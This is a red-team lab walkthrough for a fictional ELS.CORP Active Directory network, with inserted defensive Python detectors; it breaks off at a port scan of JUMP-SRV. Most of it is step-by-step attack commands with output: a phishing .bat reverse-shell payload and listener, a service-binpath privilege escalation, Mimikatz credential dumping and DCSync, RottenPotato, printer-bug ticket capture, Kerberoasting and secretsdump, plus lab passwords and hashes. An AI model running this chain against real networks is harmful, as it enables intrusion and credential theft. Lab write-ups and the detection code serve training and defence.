
Red-teaming Active Directory Lab #3 (ELS.CORP)
(Attack Path 1)

Contents
1 Mail Server Attack Path (Path 1)
1.1 DEV-SYS
1.2 DB-SRV
1.3 ELS-DC
1.4 MGMT-DC
1.5 JUMP-SRV
1.6 Admin-SYS

Scenario
You have been asked to execute a (black-box) red teaming exercise against eLS Corp (including any
related/trusted forest). The letter of engagement has specified:

1. The ADMIN-SYS system is the crown jewel. This means that the ultimate goal of this red teaming
exercise is to obtain access to the ADMIN-SYS system.
2. During this exercise, the web application hosted on 172.16.250.2 is out of scope and should not
be touched.
3. The mail server hosted on 172.16.250.2 is included in the scope and you can execute phishing
attempts. Note that the only file type you can attach is .bat files.
4. The pentesters’ network range is 172.16.25.0/24 and a static route has been configured so that
pentesters can access the 172.16.250.0/24 network range, where eLS Corp assets exist.
5. For any cracking activities use the /usr/share/wordlists/rockyou.txt wordlist, included in the latest Kali.

Hints
Refer to the attack path diagram of page 1 only when you are out of options.

1 DEV-SYS Server

Scanning the accessible IP range from the scope of engagement provides us with two possible entry
points, both residing on the “172.16.250.2” IP. Specifically, scanning the TCP ports of 172.16.250.2 tells us
that an SMTP server and a web application are running on TCP ports 25 and 80. According to the letter of
engagement, the web application is out of scope.

Let’s perform banner grabbing against the SMTP service running on the target server. A username
“dev-user@els.corp” is visible, which means a mailbox belongs to this particular user.

Since there is no other entry point, we need to send a malicious attachment along with an e-mail to
“dev-user” and wait until the attachment is opened.

We will use msfvenom to generate a malicious batch file that will be sent as an attachment to the victim
machine.

msfvenom -p cmd/windows/reverse_powershell LHOST=172.16.25.x LPORT=4443 > attach.bat

Let’s now set up our listener using Metasploit, using the above TCP port and IP address.

msfconsole
use exploit/multi/handler
set payload cmd/windows/reverse_powershell
set LHOST <your_IP_Address>
set LPORT <Listening_Port>
run

For sending the e-mail to our target [“dev-user@els.corp”] we will use the “sendemail” tool, as follows.

cat msg.txt | sendemail -l email.log -f "sender@test.com" -u "subject" -t "dev-user@els.corp" -s "172.16.250.2:25" -o tls=no -a attachment.bat

Switches:

-l: Log file
-f: Sender of the mail
-u: Subject of the mail
-t: Target user (recipient)
-s: Server to connect to while sending the mail
-o tls=no: Do not negotiate TLS with the server
-a: Attachment to send with the mail

The e-mail has been sent successfully when the following message appears:

As soon as our attachment is opened by the target user [“dev-user@els.corp”], we will have our initial
foothold on the target user’s machine.

This session can then be converted into a stable Meterpreter session, as follows:

use post/multi/manage/shell_to_meterpreter
set payload_override windows/meterpreter/reverse_tcp
set session <session_ID>
set LHOST 172.16.25.x
set LPORT <listening_port>
run

or

sessions -u <session_ID>

We now have a stable Meterpreter session with “dev-user” domain user rights. We now need to
enumerate the environment and elevate our privileges in order to move forward in the network.

After enumerating the services, we as “dev-user” have FULL CONTROL over the SNMPTRAP service.

C:\Windows\system32> sc qc snmptrap
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: snmptrap
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : .\Administrator

Since we have full control over this service, we can elevate our privileges to local administrator by
adding dev-user to the “Administrators” group through the binary path of the service.

sc stop snmptrap
sc config snmptrap binpath= "net localgroup Administrators dev-user /add"
sc start snmptrap

Exit the shell and spawn a new shell from the Meterpreter prompt. We can see that “dev-user” can
now be found as a member of the local Administrators group.

C:\Windows\system32> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
ELS-CHILD\dev-user
ELS-CHILD\Domain Admins
The command completed successfully.
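The defender’s side of the step above, as an added example that is not part of the lab write-up: a small detector over Sysmon Event ID 13 (“RegistryEvent: Value Set”) records that flags a service ImagePath being repointed at a command interpreter or at a user-writable directory, which is exactly what `sc config snmptrap binpath= "net localgroup ..."` produces. The event records are constructed to resemble Sysmon fields after normalisation by a log pipeline; only the computer and service names come from the write-up, the Spooler event and the LOLBIN list are my own.

```python
"""Detect a Windows service being repointed at a command instead of a service
binary, from Sysmon Event ID 13 ("RegistryEvent: Value Set") records.

Added example, not code from the lab write-up. The event records below are
constructed; field names follow Sysmon's schema (TargetObject, Details, Image).
"""
import re
from typing import Dict, Iterable, List, Tuple

# ImagePath value of any service under the Services key.
IMAGEPATH_RE = re.compile(r"\\Services\\(?P<svc>[^\\]+)\\ImagePath$", re.IGNORECASE)

# Interpreters and admin tools that are never a service image by themselves.
LOLBINS = {"net", "net1", "cmd", "powershell", "pwsh", "sc", "reg", "rundll32",
           "mshta", "wscript", "cscript", "certutil", "bitsadmin", "msiexec"}

# Directories a standard user can write to; a service image there is a red flag.
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\windows\\temp\\", "\\temp\\")

# Constructed Sysmon Event ID 13 records: the tampering from the write-up, the
# later restore of the real binary, and an unrelated Start-value change.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "13", "Computer": "DEV-SYS", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\snmptrap\ImagePath",
     "Details": "net localgroup Administrators dev-user /add"},
    {"EventID": "13", "Computer": "DEV-SYS", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\snmptrap\ImagePath",
     "Details": r"C:\Windows\System32\snmptrap.exe"},
    {"EventID": "13", "Computer": "DEV-SYS", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\Start",
     "Details": "DWORD (0x00000002)"},
]


def service_image(value: str) -> str:
    """Return the executable part of an ImagePath (quoted path or first token)."""
    v = value.strip()
    if v.startswith('"'):
        end = v.find('"', 1)
        return v[1:end] if end > 0 else v[1:]
    return v.split(" ", 1)[0]


def is_suspicious_image_path(value: str) -> bool:
    """True when the ImagePath does not look like a normal service executable."""
    image = service_image(value).replace("/", "\\")
    base = image.rsplit("\\", 1)[-1].lower()
    name, _, ext = base.rpartition(".")
    if not name:                      # no extension at all, e.g. "net"
        name, ext = ext, ""
    if name in LOLBINS:
        return True
    if ext not in ("exe", "sys"):     # services are PE images or kernel drivers
        return True
    return any(d in image.lower() for d in USER_WRITABLE)


def detect_service_tampering(events: Iterable[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (computer, service, new_value) for every suspicious ImagePath change."""
    hits = []
    for ev in events:
        if ev.get("EventID") != "13":
            continue
        m = IMAGEPATH_RE.search(ev.get("TargetObject", ""))
        if m and is_suspicious_image_path(ev.get("Details", "")):
            hits.append((ev.get("Computer", "?"), m.group("svc"), ev.get("Details", "")))
    return hits


if __name__ == "__main__":
    for computer, svc, value in detect_service_tampering(SAMPLE_EVENTS):
        print(f"[!] {computer}: service '{svc}' ImagePath set to: {value}")
```

The detection is a symptom check; the root cause is the service DACL that grants dev-user SERVICE_CHANGE_CONFIG. On the host, `sc sdshow snmptrap` prints that DACL in SDDL, where the `DC` right is SERVICE_CHANGE_CONFIG; only SYSTEM and Administrators should hold it.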

A database connection configuration file is located on the Administrator’s Desktop, but as a local
Administrators member we still do not have enough privileges to view it.

To view the file, we can impersonate the token of Administrator on DEV-SYS, as follows.

load incognito
list_tokens -u

<Result>
Delegation Tokens Available
====================
DEV-SYS\Administrator
ELS-CHILD\dev-admin
ELS-CHILD\dev-user
[..SNIP..]
</Result>

impersonate_token "DEV-SYS\\Administrator"
getuid

Now, as DEV-SYS\Administrator we can view the file located at the Administrator’s Desktop. An IP
address of a Database server is clearly visible in the file.

As part of our post-exploitation activities, we will dump the credentials on this machine to maintain
stable persistence.

But first, let us migrate to an x64 process and load the kiwi module to dump credentials.

migrate <x64_pid>
load kiwi
kiwi_cmd 'sekurlsa::logonpasswords'

[..SNIP..]

msv :
 [00000003] Primary
 * Username : dev-admin
 * Domain   : ELS-CHILD
 * NTLM     : 7b53c60e9113cc8b194cb34de4805f3b
 * SHA1     : 72fd2c3d682d3957fd6b8523dd86cc12ba51aef2
 * DPAPI    : f5cfd88d690e1e9338e2ed8162a6b6b4
tspkg :
wdigest :
 * Username : dev-admin
 * Domain   : ELS-CHILD
 * Password : H@rdP@ssD!ff!cult964!!
kerberos :
 * Username : dev-admin
 * Domain   : ELS-CHILD.ELS.CORP
 * Password : (null)
ssp :
credman :

[..SNIP..]

“dev-admin” (domain user) credentials have been discovered. Now, let’s add a route to the 10.10.1.0/24
network discovered in the configuration file.

route add 10.10.1.0/24 <session_ID>

2 DB-SRV Server

By performing a ping sweep on the 10.10.1.0/24 network, the following hosts were found live.

use post/multi/gather/ping_sweep
set rhosts 10.10.1.0/24
set session <session_ID>
run

[..SNIP..]
[+] 10.10.1.1 host found
[+] 10.10.1.2 host found
[+] 10.10.1.3 host found
[..SNIP..]

Scanning for open TCP ports on the 10.10.1.2 machine that we discovered shows that TCP port 1433
is open.

The discovered “dev-admin” credentials can be sprayed on the target network. Metasploit’s
“scanner/mssql/mssql_login” module can be used to check whether a SQL instance is running on the specified
machines and whether the credentials are accepted.

The following text box shows how to use the “dev-admin” credentials with the above-mentioned
Metasploit module to check whether we have access to any MS SQL instances on the machines we
discovered on the internal network.

use scanner/mssql/mssql_login
set username dev-admin
set password H@rdP@ssD!ff!cult964!!
set rhosts 10.10.1.1-3
run


It seems that dev-admin can log in to the DB-SRV [10.10.1.2] machine.

Trying to enable “xp_cmdshell” to maintain a persistent shell on the DB-SRV machine fails
because the user has insufficient rights to do so.

After enumeration, it was found that there is a SQL impersonation vulnerability on the DB-SRV
machine through which the “dev-admin” login can impersonate the “sa” login.

use admin/mssql/mssql_escalate_execute_as
set USERNAME dev-admin
set PASSWORD H@rdP@ssD!ff!cult964!!
set RHOSTS 10.10.1.2
run

“dev-admin” now has system admin rights.
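The defensive counterpart of the EXECUTE AS escalation above, as an added example that is not part of the lab write-up: an audit that takes the IMPERSONATE grants of an instance and reports every login that can reach a sysadmin login through a chain of impersonations, not just the direct dev-admin → sa grant. The rows are constructed; the catalog query that would produce them on a real instance is quoted in the module docstring, and all logins other than dev-admin and sa are invented.

```python
"""Audit IMPERSONATE grants on a SQL Server instance for chains that end in a
sysadmin login (the misconfiguration mssql_escalate_execute_as abuses).

Added example, not part of the lab write-up. The rows are constructed; on a
real instance they would come from:

    SELECT gr.name AS grantee, tg.name AS target
    FROM sys.server_permissions pe
    JOIN sys.server_principals gr ON pe.grantee_principal_id = gr.principal_id
    JOIN sys.server_principals tg ON pe.major_id = tg.principal_id
    WHERE pe.class_desc = 'SERVER_PRINCIPAL'
      AND pe.permission_name = 'IMPERSONATE' AND pe.state IN ('G', 'W');

and sysadmin membership from IS_SRVROLEMEMBER('sysadmin', name).
"""
from collections import deque
from typing import Dict, Iterable, List, Set, Tuple

# Constructed (grantee, target) pairs: grantee may run EXECUTE AS LOGIN = target.
IMPERSONATE_GRANTS: List[Tuple[str, str]] = [
    ("ELS-CHILD\\dev-admin", "sa"),        # the direct grant the lab exploits
    ("web_app", "reporting_user"),         # a three-hop chain ending in a sysadmin
    ("reporting_user", "etl_user"),
    ("etl_user", "dbo_ops"),
    ("readonly_user", "reporting_user2"),  # dead end: reporting_user2 reaches nothing
]
SYSADMINS: Set[str] = {"sa", "dbo_ops"}   # constructed sysadmin role membership


def build_adjacency(grants: Iterable[Tuple[str, str]]) -> Dict[str, Set[str]]:
    adj: Dict[str, Set[str]] = {}
    for grantee, target in grants:
        adj.setdefault(grantee, set()).add(target)
    return adj


def impersonation_path(grants, start: str, targets: Set[str]) -> List[str]:
    """Shortest EXECUTE AS chain from `start` to any login in `targets`, or []."""
    adj = build_adjacency(grants)
    parents = {start: None}            # BFS tree, used to rebuild the chain
    queue = deque([start])
    while queue:
        login = queue.popleft()
        if login != start and login in targets:
            path, node = [], login
            while node is not None:
                path.append(node)
                node = parents[node]
            return path[::-1]
        for nxt in sorted(adj.get(login, ())):
            if nxt not in parents:
                parents[nxt] = login
                queue.append(nxt)
    return []


def effective_sysadmins(grants, sysadmins: Set[str]) -> Dict[str, List[str]]:
    """Logins that are not sysadmin themselves but can become one via IMPERSONATE."""
    findings: Dict[str, List[str]] = {}
    for login in sorted({g for g, _ in grants}):
        if login in sysadmins:
            continue
        path = impersonation_path(grants, login, sysadmins)
        if path:
            findings[login] = path
    return findings


if __name__ == "__main__":
    for login, chain in effective_sysadmins(IMPERSONATE_GRANTS, SYSADMINS).items():
        print(f"[!] {login} -> sysadmin via: {' -> '.join(chain)}")
```

Each reported chain is a finding to revoke (`REVOKE IMPERSONATE ON LOGIN::sa FROM [ELS-CHILD\dev-admin]`); the `sa` login itself should normally be disabled, so that no grant can target it at all.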

With sufficient privileges, we can now enable “xp_cmdshell” to establish a stable bind shell on the
DB-SRV server.

use exploit/windows/mssql/mssql_payload
set USERNAME dev-admin
set PASSWORD H@rdP@ssD!ff!cult964!!
set RHOSTS 10.10.1.2
set payload windows/meterpreter/bind_tcp
set LHOST 172.16.25.x
run

The module will enable the SQL function (xp_cmdshell) and upload a malicious VBS script to DB-SRV.

We are currently running as the SQL service account. We need to escalate privileges on DB-SRV.

Listing the privileges of the SQL service account shows that we have “SeImpersonatePrivilege” and
“SeAssignPrimaryTokenPrivilege”, so we can use the infamous RottenPotato exploit to escalate our
privileges to ‘NT AUTHORITY\SYSTEM’.

On the Meterpreter prompt, do the following to escalate to “NT AUTHORITY\SYSTEM”:

On the meterpreter shell:
upload rotten_potato.exe C:\\Users\\Public\\rotten.exe
cd C:\\Users\\Public

Execute RottenPotato from meterpreter:

execute -cH -f ./rotten.exe
CTRL+Z (background the channel)

Back on the meterpreter shell:
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid
shell

Successfully escalated to SYSTEM privileges.

Now, we will check whether any type of delegation is enabled on this server; one can always use the AD
Module or PowerView for confirmation. Let’s use the AD Module to check for delegation.

On the meterpreter shell, upload the AD Module DLL file:

upload Microsoft.ActiveDirectory.Management.dll C:\\Users\\Public\\Microsoft.ActiveDirectory.Management.dll

On a shell (switch to PowerShell):

Import-Module C:\Users\Public\Microsoft.ActiveDirectory.Management.dll -Verbose
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

DB-SRV is configured with unconstrained delegation! Now, let us leverage this and try to force a
privileged account to connect to the DB-SRV server.
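The same check from the defender’s side, as an added example that is not part of the lab write-up: it decodes the userAccountControl bits behind `TrustedForDelegation` and flags the two conditions that make the next step possible, a non-domain-controller computer with unconstrained delegation and a privileged account that is still allowed to be delegated. The directory records are constructed to look like LDAP attributes; ELS-DC, DB-SRV and els-admin are names from the write-up, APP-01, svc-backup and the userAccountControl values are invented.

```python
"""Audit Kerberos delegation settings from userAccountControl flags.

Added example, not part of the lab write-up. The records below are constructed
to resemble the LDAP attributes sAMAccountName, userAccountControl and
msDS-AllowedToDelegateTo; flag values are the documented UAC bits.
"""
from typing import Dict, Iterable, List, Set

# userAccountControl bits (MS-ADTS 2.2.16 / MS-SAMR).
WORKSTATION_TRUST_ACCOUNT = 0x1000          # member server / workstation computer account
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

# Constructed directory snapshot.
DIRECTORY: List[Dict] = [
    {"sAMAccountName": "ELS-DC$", "userAccountControl": 0x82000},     # DC, unconstrained: expected
    {"sAMAccountName": "DB-SRV$", "userAccountControl": 0x81000},     # member server, unconstrained: finding
    {"sAMAccountName": "APP-01$", "userAccountControl": 0x1001000,    # constrained + protocol transition
     "msDS-AllowedToDelegateTo": ["cifs/files.els.corp"]},
    {"sAMAccountName": "els-admin", "userAccountControl": 0x200},     # privileged, delegatable: finding
    {"sAMAccountName": "svc-backup", "userAccountControl": 0x100200}, # privileged, NOT_DELEGATED set: ok
]
PRIVILEGED: Set[str] = {"els-admin", "svc-backup"}   # e.g. Domain Admins / Tier 0 membership


def audit_delegation(objects: Iterable[Dict], privileged: Set[str]) -> List[str]:
    """Return one finding string per risky delegation setting, in directory order."""
    findings = []
    for obj in objects:
        name = obj["sAMAccountName"]
        uac = obj["userAccountControl"]
        is_computer = name.endswith("$")
        if is_computer and uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            # Any account authenticating here leaves a forwardable TGT in memory.
            findings.append(f"{name}: unconstrained delegation on a non-DC host")
        if is_computer and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            targets = ", ".join(obj.get("msDS-AllowedToDelegateTo", [])) or "(none)"
            findings.append(f"{name}: constrained delegation with protocol transition to {targets}")
        if not is_computer and name in privileged and not uac & NOT_DELEGATED:
            findings.append(f"{name}: privileged account can be delegated "
                            f"(set NOT_DELEGATED or add to Protected Users)")
    return findings


if __name__ == "__main__":
    for line in audit_delegation(DIRECTORY, PRIVILEGED):
        print("[!]", line)
```

The second rule is the control that would have blunted the step that follows in the write-up: a DC computer account cannot be marked NOT_DELEGATED, but the coercion vector itself (the Print Spooler service on the domain controller) can be disabled where it is not needed.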

With enough privileges, we will now abuse the famous printer bug to get a TGT from the els.corp
Domain Controller. Upload “Rubeus.exe” and “MS-RPRN.exe” to the DB-SRV server; in one shell
run Rubeus, while in another one coerce “els-dc” to connect in order to capture the TGT, as follows.

On the meterpreter shell:

upload Rubeus.exe C:\\Users\\Public\\Rubeus.exe
upload MS-RPRN.exe C:\\Users\\Public\\MS-RPRN.exe

shell (i.e. channel 1)
Rubeus.exe monitor /interval:5
CTRL+Z (background the channel)

shell (i.e. channel 2)
MS-RPRN.exe \\els-dc.els.corp \\db-srv.els.corp
CTRL+Z (background the channel)

On the meterpreter shell, switch to channel 1:

channel -i 1
(The TGT of els-dc$ is captured)

If the following message appears while executing MS-RPRN.exe, then the forced connection from
“els-dc” might have worked.

‘Attempted printer notification and received an invalid handle. The coerced authentication probably worked!’

Since the extracted TGT is base64-encoded and printed with line breaks and indentation, we need to
remove the extra whitespace and then perform a pass-the-ticket attack against the ‘els-dc’ domain controller.

On the PowerShell prompt:

$tgt = 'base64_encoded_ticket'
$tgt -replace("`n      ", "") -replace("`r", "")

NOTE: There are 6 spaces in the second command; otherwise remove the spaces manually using Notepad etc.

Perform PTT using “Rubeus.exe”:

Rubeus.exe ptt /ticket:<b64_enc_tkt>

[*] Action: Import Ticket
[+] Ticket successfully imported!

The active Kerberos ticket can be viewed as follows:

Now, with an “ELS-DC$” ticket active in the current session, we will use Mimikatz to perform a
DCSync attack against the “els.corp” domain.

In the meterpreter session:

upload mimikatz.exe C:\\Users\\Public\\mimikatz.exe
shell

In the command channel:

C:\Users\Public\mimikatz.exe
privilege::debug
lsadump::dcsync /user:els\krbtgt

<Result> NTLM: a8a94897fbb33ed8925f17ba7ccdff67 </Result>

lsadump::dcsync /user:els\els-admin

<Result> NTLM: 8645e87e2593507cf623f3291b1334c2 </Result>

We are able to perform a DCSync attack because the Domain Controller computer account by
default has the “DS-Replication-Get-Changes” and “DS-Replication-Get-Changes-All” rights over the domain object.

3 ELS-DC Server

With access to the “els-admin” domain admin account we can maintain a stable persistent shell on the
ELS-DC server.

Use Metasploit’s windows/smb/psexec module to establish a connection with the target machine.

In msfconsole:

use exploit/windows/smb/psexec
set RHOSTS 10.10.1.3
set SMBDOMAIN els.corp
set SMBUSER els-admin
set SMBPASS cc5e9acbad1b25c9aad3b435b51404ee:8645e87e2593507cf623f3291b1334c2

Payload settings:

set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.10.1.3
run

File operations (in the new meterpreter session):

upload PowerView_dev.ps1 C:\\Users\\Public\\PowerView_dev.ps1

Using PowerView, we will enumerate any misconfigurations that we can abuse across the cross-forest
trust established between “ELS.CORP” and “MGMT.CORP”.

With the following query, we will enumerate accounts with SPNs across the forest trust. It is possible to
perform Kerberoasting across forest trusts; all we need is the TGS of an account with an SPN.

Import-Module C:\Users\Public\PowerView_dev.ps1
Get-NetDomainTrust | ? {$_.TrustType -ne 'External'} | %{Get-NetUser -SPN -Domain $_.TargetName}

<..SNIP..>

distinguishedname    : CN=spn_svc,OU=SPN_Service,DC=mgmt,DC=corp
displayname          : spn_svc
userprincipalname    : spn_svc@mgmt.corp
name                 : spn_svc
serviceprincipalname : {http/mgmt-dc.mgmt.corp, http/mgmt-dc}
objectsid            : S-1-5-21-3658202825-2428483480-107650130-1106
samaccountname       : spn_svc

<..SNIP..>

It can be clearly seen that a domain user of the MGMT domain, “spn_svc”, has an SPN set, so it is
possible to retrieve the service ticket hash, as follows:

Request-SPNTicket -SPN http/mgmt-dc.mgmt.corp -Verbose

<..SNIP..>

SamAccountName       : UNKNOWN
DistinguishedName    : UNKNOWN
ServicePrincipalName : http/mgmt-dc.mgmt.corp
TicketByteHexStream  :
Hash                 : $krb5tgs$23$*UNKNOWN$UNKNOWN$http/mgmt-dc.mgmt.corp*$9EEE528138FF481DAC208A40D7E4E82B$CAF6C38136D32C4F2C32C77A9D35520F68A3E647FB3875E03EC06776968923F1A324A59DD9B11980DBA5F2D849170E3AA20146E9E72B9D2ED765E48A2B00750DE28DBA183431513EF085C8CE9CADBCC3BD4D0937A3195940A6F39E45C583B1FFBBAB56006C5CC51041B0AD9A8F6C5A63F5EA61EEDEB4F1AB66525A42F8CC6708D8BCD36EC6FDE350CF2B78CEDFC8EBE82DE2BE302A47921AB9E9486897DE658B9F1AF037A4AEAB4491455CEDDD5AD2A67D07B502BCDC2DA136E48B6D966391BB70B72846DC3310CA1AF6A3FA6F693DDF198E389C6F0FFE4EE0CF63242B2A1AFB7E902FCF8680B197B64C4F295FD803C03DBEF35F670DA9769D0CD9487819B6B2FE0C0231AB0544D3

<..SNIP..>

To extract only the hash part from the output, we filter it and write the hashes to a file as
follows:

Invoke-Kerberoast -Domain mgmt.corp | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast

→ Base64 file transfer:

$file = "C:\Users\Public\hashes.kerberoast"
$ba = [System.IO.File]::ReadAllBytes($file)
$str = [System.Convert]::ToBase64String($ba)
$str

→ On your attacking machine:

echo "base64_format" | base64 -d > hashes.kerberoast
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast

The service account (‘spn_svc’) password is recovered by brute-forcing the hash with the wordlist.

Credentials: “spn_svc\B@DB!tch”

The domain user “spn_svc” of “MGMT.corp” is also a member of the Administrators group on the
MGMT-DC domain controller.

The IP address of MGMT-DC can be found using a simple ping command or an nslookup DNS query
[10.10.3.2].
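The Kerberoast step above leaves a trace on the MGMT-DC that issued the ticket, and this added example (not part of the lab write-up) shows the detection logic a defender would run over Security event 4769 records: RC4-HMAC (0x17) service tickets for accounts that are not computer accounts or krbtgt, grouped by requesting host, with a threshold so that one ordinary service ticket is not an alert. The events are constructed; spn_svc and the requesting ELS-DC address (10.10.1.3) come from the write-up, sql_svc, the other addresses and the status codes are invented. The `allows_rc4` helper encodes the hardening that removes the $krb5tgs$23$ hash type from the picture.

```python
"""Spot Kerberoasting in Security event 4769 (Kerberos service ticket requested)
records and check whether an account still permits RC4 service tickets.

Added example, not part of the lab write-up. Events are constructed; field
names follow the 4769 event schema (ServiceName, TicketEncryptionType,
IpAddress, Status).
"""
from collections import defaultdict
from typing import Dict, Iterable, List

RC4_HMAC = "0x17"
# msDS-SupportedEncryptionTypes bits: RC4 = 0x4, AES128 = 0x8, AES256 = 0x10.
ENCTYPE_RC4 = 0x4
AES_ONLY_SUPPORTED_ENCTYPES = 0x18

EVENTS: List[Dict[str, str]] = [
    {"EventID": "4769", "ServiceName": "spn_svc", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.1.3", "TargetUserName": "els-admin@ELS.CORP", "Status": "0x0"},
    {"EventID": "4769", "ServiceName": "MGMT-DC$", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:10.10.3.10", "TargetUserName": "jump-admin@MGMT.CORP", "Status": "0x0"},
    {"EventID": "4769", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:10.10.3.10", "TargetUserName": "jump-admin@MGMT.CORP", "Status": "0x0"},
    {"EventID": "4769", "ServiceName": "sql_svc", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.1.3", "TargetUserName": "els-admin@ELS.CORP", "Status": "0x0"},
    {"EventID": "4769", "ServiceName": "sql_svc", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.3.10", "TargetUserName": "jump-admin@MGMT.CORP", "Status": "0x0"},
    # Failed request (KDC_ERR_ETYPE_NOSUPP): no ticket was issued, so nothing to crack.
    {"EventID": "4769", "ServiceName": "spn_svc", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.3.10", "TargetUserName": "jump-admin@MGMT.CORP", "Status": "0xe"},
]


def normalise_ip(ip: str) -> str:
    """4769 logs IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d); strip the prefix."""
    return ip[len("::ffff:"):] if ip.startswith("::ffff:") else ip


def is_roastable_request(ev: Dict[str, str]) -> bool:
    """A successful RC4 service ticket for an account with a human-set password."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769"
            and ev.get("Status", "0x0") == "0x0"
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not svc.endswith("$")          # computer accounts have random passwords
            and svc.lower() != "krbtgt")       # TGT renewals, not a service ticket


def roast_candidates(events: Iterable[Dict[str, str]], min_distinct: int = 2) -> Dict[str, List[str]]:
    """Source IP -> sorted service accounts, for sources that requested RC4 tickets
    for at least `min_distinct` different accounts."""
    by_src: Dict[str, set] = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            by_src[normalise_ip(ev["IpAddress"])].add(ev["ServiceName"])
    return {src: sorted(names) for src, names in by_src.items() if len(names) >= min_distinct}


def allows_rc4(supported_enctypes: int) -> bool:
    """True when msDS-SupportedEncryptionTypes still permits RC4 service tickets.
    An unset attribute (0) falls back to the KDC default, which historically
    included RC4, so it is treated as permissive here."""
    return supported_enctypes == 0 or bool(supported_enctypes & ENCTYPE_RC4)


if __name__ == "__main__":
    for src, names in roast_candidates(EVENTS).items():
        print(f"[!] {src} requested RC4 tickets for: {', '.join(names)}")
```

Setting msDS-SupportedEncryptionTypes to 0x18 on spn_svc (or converting it to a group-managed service account, whose password is 120 random characters) turns the captured hash into an AES one that a wordlist attack does not break.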

4 MGMT-DC Server

On the current meterpreter session add a route to the “10.10.3.0/24” network and then start a SOCKS
server to access MGMT-DC.mgmt.corp.

Perform the following actions to establish a persistent shell on the MGMT-DC server.

route add 10.10.3.0/24 <session_id>

Start SOCKS server to route traffic from the established meterpreter shell

use auxiliary/server/socks4a
set SRVHOST 172.16.25.x
run -j

Modify the proxychains.conf file

nano /etc/proxychains.conf
socks4 172.16.25.x 1080

Add to host file

nano /etc/hosts

10.10.3.2 MGMT-DC.MGMT.CORP

Now get access to “MGMT-DC.mgmt.corp” leveraging impacket’s psexec.py script.

proxychains psexec.py -debug -dc-ip 10.10.3.2 spn_svc@MGMT-DC.MGMT.CORP

NOTE: Enter “B@DB!tch” as the password.

Switch to PowerShell.

We will use the Active Directory module present on the server to list the OUs present in
MGMT-DC and all the members present in the available OUs.

List all OUs in MGMT.CORP:

Import-Module ActiveDirectory
Get-ADObject -Filter {ObjectClass -eq 'organizationalunit'} -Properties CanonicalName | Select-Object DistinguishedName

Get members of the “Bastion-Host” OU:

$oupath = "OU=Bastion-Host,DC=mgmt,DC=corp"
Get-ADUser -Filter * -SearchBase $oupath

(jump-admin user discovered)

The Domain user “Jump-Admin” present in the “Bastion-Host” OU can be useful in moving forward
from the MGMT-DC server. The IP address of “jump-srv” server can be enumerated by actively
querying the DNS record.

nslookup jump-srv

<..SNIP..>

Name: jump-srv.mgmt.corp
IP Address: 10.10.3.3

<..SNIP..>

However, we will extract all the credentials present in the MGMT.CORP domain leveraging
impacket’s secretsdump.py script.

On a new bash prompt, using our route to the internal network [10.10.3.0/24], we will execute
secretsdump.py as follows:

proxychains secretsdump.py -debug -dc-ip 10.10.3.2 spn_svc@MGMT-DC.MGMT.CORP

[..SNIP..]

mgmt-admin:500:aad3b435b51404eeaad3b435b51404ee:86c64a256e8aeb2edf31b4157bf6becb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2a7a0f537983bac4120725d055fcbba9:::
mgmt.corp\jump-admin:1104:aad3b435b51404eeaad3b435b51404ee:2dc9bff397f9e6c9f08a05b18145a7b6:::
mgmt.corp\spn_svc:1106:aad3b435b51404eeaad3b435b51404ee:2dc9bff397f9e6c9f08a05b18145a7b6:::

[..SNIP..]

Crack the “jump-admin” hash using John the Ripper by storing the NT hash in a file.

→ Crack the jump-admin hash (2dc9bff397f9e6c9f08a05b18145a7b6):

Copy the hash “2dc9bff397f9e6c9f08a05b18145a7b6” into the file jump-adminpass.txt

john --format=NT jump-adminpass.txt -w=/usr/share/wordlists/rockyou.txt

The hash is cracked and we now have the clear-text credentials of the “jump-admin” domain user.

We will now perform port scanning against the newly discovered IP address.

5 Jump-Srv

Let’s perform a TCP port scan against the target 10.10.3.3 [jump-srv.mgmt.corp] using nmap and
leveraging the route to the 10.10.3.0/24 network.

Using meterpreter’s active route to the “10.10.3.0/24” network, on a new bash shell:

proxychains nmap --top-ports 10 -sT -sV -Pn 10.10.3.3

<..SNIP..>

Nmap scan report for 10.10.3.3
Host is up (2.4s latency).

PORT    STATE  SERVICE VERSION
21/tcp  closed ftp
